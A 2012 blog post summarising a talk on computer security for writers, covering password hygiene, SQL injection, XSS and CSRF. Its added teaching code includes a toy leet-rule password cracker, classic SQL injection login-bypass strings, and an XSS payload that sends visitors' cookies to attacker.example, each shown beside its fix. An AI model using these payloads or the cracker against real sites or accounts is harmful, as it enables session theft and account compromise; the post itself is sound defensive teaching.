Monday, July 30, 2012

JT Evans on Computer Security for Writers (Part 3) by DeAnna Knippling

Editor’s Note: This is the third in a three-part series. You can read Part 1 here and Part 2 here.

JT Evans, as well as being a writer, is a computer security expert who started programming at the age of seven and has been a Certified Ethical Hacker since 2009. During his June Write Brain talk, he covered three main topics: how writers should take care of their computers, computer security basics for writers, and what the bad guys are doing with computers.

What the Bad Guys Are Doing with Computers

The bad guys are violating one of three principles of computer security when they go after someone’s computer:
Confidentiality. For example, sending your personal information to someone without your authorization.
Integrity. For example, changing test scores or introducing a virus onto your system.
Availability. For example, taking down a website or server so that the people who are supposed to use it can’t.
These are known as the CIA triad of computer security.

What methods can the bad guys use?

Denial of Service (DoS) or Distributed Denial of Service (DDoS) attack. This kind of attack blocks users’ access to a computer, website, or network. The original DoS attacks took advantage of particular bugs in operating systems such as Windows 95/ME/XP that let a bad guy crash your computer over the network (a division by zero error was involved in one of them). Bugs of that kind are mostly patched now. DDoS attacks instead use botnets (large numbers of compromised computers under one person’s control) to send so many requests to a webpage or server that it can’t serve them all, effectively taking the site down for a time. There is no bug to patch in that case; the victim is simply outnumbered.

Weak password vulnerabilities. A cracking program can try an enormous number of guesses from dictionary files very quickly. Because a lot of people have easily guessed passwords (from “password” itself to their spouse’s name), a lot of people are vulnerable to this kind of attack. Here are some password tips:
Use at least eight characters; longer is better.
Use a mix of lowercase, uppercase, digits, and symbols whenever possible.
Don’t depend on replacing letters with numbers or symbols (as in p@ssw0rd), because cracking programs apply those substitutions to every word in their dictionaries automatically.
Don’t use an easily guessed word or sequence as a password (password, 123456, qwerty, letmein, etc.).
Use a phrase that you can easily remember (like a book title) to build a password from the initial letters of each word (e.g., TQBFJOTLD for “The quick brown fox jumps over the lazy dog”). Pick a phrase that is personal to you rather than one that is famous on its own.
Don’t use the same password everywhere. If a website is hacked, every password stored on it may be exposed (as in the recent LinkedIn hacking), and the bad guys will try those passwords on other sites. You don’t want your bank password to be the same one that leaked from a social networking site, do you?
A good way to store passwords is to keep them all (with user names and websites) in a text file encrypted with GPG, protected by one really good passphrase that you don’t use anywhere else.
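To show why the p@ssw0rd tip matters, here is an added example (not code from JT’s talk) of the kind of dictionary attack he describes. The wordlist, the mangling rules and the “leaked” user table are all constructed for the demonstration and are tiny next to what real cracking tools use; the hashes are unsalted SHA-1 only because that is what the LinkedIn dump used.

```python
"""Why p@ssw0rd is no safer than password: a toy dictionary attack.

Added example, not code from the talk. The wordlist, the leaked user table
and the mangling rules are all constructed for this demonstration, and they
are tiny compared with what a real cracking tool uses. The hashes are
unsalted SHA-1 only because that is what the 2012 LinkedIn dump used.
"""
import hashlib
import itertools

# Constructed mini wordlist; real lists run to millions of entries.
WORDLIST = ["password", "letmein", "qwerty", "123456", "monkey", "sarah"]

# Letter-for-symbol swaps that cracking tools apply automatically, which is
# why "p@ssw0rd" offers no protection over "password".
LEET = {"a": ["a", "@", "4"], "e": ["e", "3"], "i": ["i", "1", "!"],
        "o": ["o", "0"], "s": ["s", "$", "5"], "t": ["t", "7"]}
SUFFIXES = ["", "1", "123", "!", "2012"]


def leet_variants(word):
    """Yield every combination of LEET substitutions for word."""
    choices = [LEET.get(ch, [ch]) for ch in word]
    for combo in itertools.product(*choices):
        yield "".join(combo)


def candidates(wordlist):
    """Expand each base word with case, leet and suffix rules, without repeats."""
    seen = set()
    for word in wordlist:
        for base in (word, word.capitalize(), word.upper()):
            for variant in leet_variants(base):
                for suffix in SUFFIXES:
                    cand = variant + suffix
                    if cand not in seen:
                        seen.add(cand)
                        yield cand


def sha1_hex(text):
    """Unsalted SHA-1, as in the LinkedIn leak; never store passwords this way."""
    return hashlib.sha1(text.encode()).hexdigest()


def crack(hashes, wordlist=WORDLIST):
    """Return {hash: plaintext} for every hash that some candidate reproduces."""
    remaining = set(hashes)
    found = {}
    for cand in candidates(wordlist):
        digest = sha1_hex(cand)
        if digest in remaining:
            found[digest] = cand
            remaining.discard(digest)
            if not remaining:
                break
    return found


def crack_table(table, wordlist=WORDLIST):
    """Map each user in a {user: hash} table to the recovered password or None."""
    found = crack(table.values(), wordlist)
    return {user: found.get(digest) for user, digest in table.items()}


def acronym(phrase):
    """Build a password from the first letter of each word, keeping its case."""
    return "".join(word[0] for word in phrase.split())


# Constructed "leaked" table: three users, unsalted SHA-1 of each password.
LEAKED = {
    "alice": sha1_hex("p@ssw0rd"),
    "bob": sha1_hex("Letmein123"),
    "carol": sha1_hex(acronym("The quick brown fox jumps over the lazy dog")),
}

if __name__ == "__main__":
    for user, password in crack_table(LEAKED).items():
        print(user, "->", password if password else "not cracked by this wordlist")
```

Run it and alice’s p@ssw0rd and bob’s Letmein123 fall out in a fraction of a second, while carol’s initial-letter password survives this wordlist. That is the whole point of the substitution rules: the attacker does not need p@ssw0rd in the dictionary, only “password” plus a rule. Note that a site protects its users from this attack by storing a slow, salted hash (bcrypt or scrypt) rather than bare SHA-1, but you cannot check what a site does, which is why the don’t-reuse-passwords tip matters.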
Buffer overflows. When you’re inputting data into a field, if the field is, say, 10 characters long for a phone number, and the program doesn’t stop someone from typing in more than that, then the extra characters overwrite whatever happens to sit next to the field in memory. A carefully crafted input can use that to change what the program does next, which is how a bad guy gets his own code to run. In the past this was the most common way to attack a system; now, with more protections built into compilers and operating systems, it’s moving to #2 after...

SQL injection. Structured Query Language (SQL) is the language used to ask questions of relational databases. It’s like a buffer overflow in that you type extra information into a field to force the database to do something it wasn’t supposed to do; the difference is that the extra text is SQL syntax, which the application pastes into its own query without realizing it, so the techniques are specific to SQL databases.
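The following is an added example (not code from the talk) of the mistake SQL injection exploits and of the fix, using an in-memory SQLite database. The users table, its columns and the two sample rows are constructed for the demonstration, and the passwords are stored in plain text only to keep the example short.

```python
"""SQL injection: the same login check written the vulnerable way and the safe way.

Added example, not code from the talk. The users table and its two rows are
constructed for this demonstration; passwords are stored in plain text only
to keep the example short (a real site stores a salted, slow hash).
"""
import sqlite3


def make_db():
    """Create an in-memory database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("deanna", "hunter2"), ("jt", "s3cret")])
    return conn


def login_vulnerable(conn, name, password):
    """Builds the query by gluing strings together, so whatever the user typed
    becomes part of the SQL. Returns the matched user name or None."""
    query = ("SELECT name FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Same check with bound parameters: the database receives the query and
    the values separately, so the values are never parsed as SQL."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Typing a quote and a comment marker into the name field ends the query
    # early, so the password check never runs.
    print(login_vulnerable(conn, "deanna' --", "anything"))   # deanna
    # An always-true clause in the password field matches every row.
    print(login_vulnerable(conn, "jt", "' OR '1'='1"))        # a user name
    # The parameterized version treats the same input as a literal string.
    print(login_safe(conn, "deanna' --", "anything"))         # None
    print(login_safe(conn, "jt", "s3cret"))                   # jt
```

The two attack strings are the classic ones: `' --` closes the quoted name and comments out the rest of the query, and `' OR '1'='1` turns the WHERE clause into something that is true for every row. The fix is not to filter quotes but to never build queries from strings at all; the `?` placeholders hand the values to the database separately from the SQL text.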

Social engineering. This is using clever tricks to get people to hand over information themselves. If someone contacts you asking for personal information and you didn’t start the exchange by asking for something first, assume it’s social engineering (phishing emails and fake antivirus warnings are common examples).

Cross Site Scripting (XSS). Here the bad guy injects script into a website (through a comment field, for example, or a specially built link) so that the site serves that script to other visitors. Their browsers run it as if it were part of the site, so it can read their session cookies or act on the site as them. This can also be used to herd many visitors’ browsers into a browser-based botnet.

Cross Site Request Forgery (CSRF). This tricks your browser into sending a request you never meant to make to a site where you’re already logged in. A page the bad guy controls contains a hidden form or image tag aimed at the other site, and your browser dutifully attaches your login cookies when it submits it. For example, if Amazon’s “Buy now with 1-Click” button were just an ordinary form, a bad guy’s page could submit it from your browser while you were logged in, without you ever visiting Amazon. (The related trick of laying an invisible button over a page so that a click anywhere lands on “Buy now” is called clickjacking.)
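To make the XSS and CSRF descriptions above concrete, here is an added example (not code from the talk and not any real site’s code) of what each looks like from the server side, with the vulnerable handler next to the fixed one. There is no web framework: a “request” is a plain dict with constructed fields, and the session store, server secret and the 1-Click purchase are all stand-ins.

```python
"""XSS and CSRF from the server side: the vulnerable handler next to the fix.

Added example, not code from the talk and not any real site's code. A
"request" is a plain dict with constructed fields (cookie_session,
form_csrf_token, item); the session store and server secret are made up, and
the 1-Click purchase stands in for any action that changes state.
"""
import hashlib
import hmac
import html

SERVER_SECRET = b"constructed-server-secret"   # assumption: private to the server
VALID_SESSIONS = {"sess-alice-1"}               # constructed: sessions the server knows


# --- XSS: the bug is putting user text into HTML unescaped; the fix is escaping on output.

def render_comment_vulnerable(comment):
    """Drops user text straight into the page: a <script> in comment runs in
    every visitor's browser with this site's cookies available to it."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Escapes <, >, &, and quotes so the browser displays the text instead of
    interpreting it as markup (this covers HTML text and attribute values only)."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


# --- CSRF: the bug is trusting a request just because the cookie came along.

def csrf_token(session_id):
    """Per-session token = HMAC(secret, session id). The real site embeds it
    in its own forms; a page on another site cannot read or compute it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def buy_one_click_vulnerable(request):
    """Accepts any POST that carries a valid session cookie. A hidden form on
    the bad guy's page is submitted by the victim's browser with the victim's
    cookie attached, so the purchase goes through."""
    if request.get("cookie_session") not in VALID_SESSIONS:
        return "not logged in"
    return "purchased " + request["item"]


def buy_one_click_safe(request):
    """Also requires the token that only the real site's own page carried."""
    sid = request.get("cookie_session")
    if sid not in VALID_SESSIONS:
        return "not logged in"
    token = request.get("form_csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(sid)):
        return "rejected: missing or bad CSRF token"
    return "purchased " + request["item"]


# Constructed requests. FORGED is what the browser sends when the bad guy's
# page auto-submits a hidden form: the cookie is there, the token is not.
FORGED = {"cookie_session": "sess-alice-1", "item": "book"}
GENUINE = dict(FORGED, form_csrf_token=csrf_token("sess-alice-1"))
XSS_PAYLOAD = ("<script>new Image().src='http://attacker.example/?c='"
               "+document.cookie</script>")

if __name__ == "__main__":
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
    print(buy_one_click_vulnerable(FORGED))
    print(buy_one_click_safe(FORGED))
    print(buy_one_click_safe(GENUINE))
```

The XSS payload is the textbook cookie thief: the vulnerable renderer emits it as live markup, the safe one emits `&lt;script&gt;` and the browser shows it as text. For CSRF, the forged request is accepted by the vulnerable handler because the browser attached the victim’s cookie, and rejected by the safe one because the attacker’s page had no way to obtain the token. Deriving the token with an HMAC over the session id is one simple scheme; web frameworks typically issue a random per-session token instead, and the check is the same.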

Lack of encryption. On an unsecured wireless network, anyone nearby can read your traffic, which means they can see everything you send and receive that isn’t itself encrypted. If you have a Virtual Private Network (VPN), use it whenever you’re on unsecured wifi, and use Secure Socket Layer (SSL) (that is, a site that starts with https:// rather than http://) whenever possible. Also, when you’re choosing the encryption for your own wireless network, use WPA2 (or WPA if your equipment has nothing newer), never WEP, which is easily broken.

Network/Host scanning. There is a wealth of tools available that will scan networks and computers for vulnerabilities. These are used by both the bad guys and the good guys: the bad guys to find a way to break into systems; the good guys to make sure it won’t be easy to break in. Some examples are nmap, Nessus/OpenVAS, Metasploit, and Kismet.

If you need more information, you can go to JT’s website, jtevans.net.

If you’d like a copy of his handouts, click here.

About the Writer:  DeAnna Knippling is a freelance writer, editor, and formatter married to a Network Administrator, and she was still embarrassed about some of her personal security practices after hearing JT's talk.  Check out her personal blog at www.DeAnnaKnippling.com or her small press at www.WonderlandPress.com.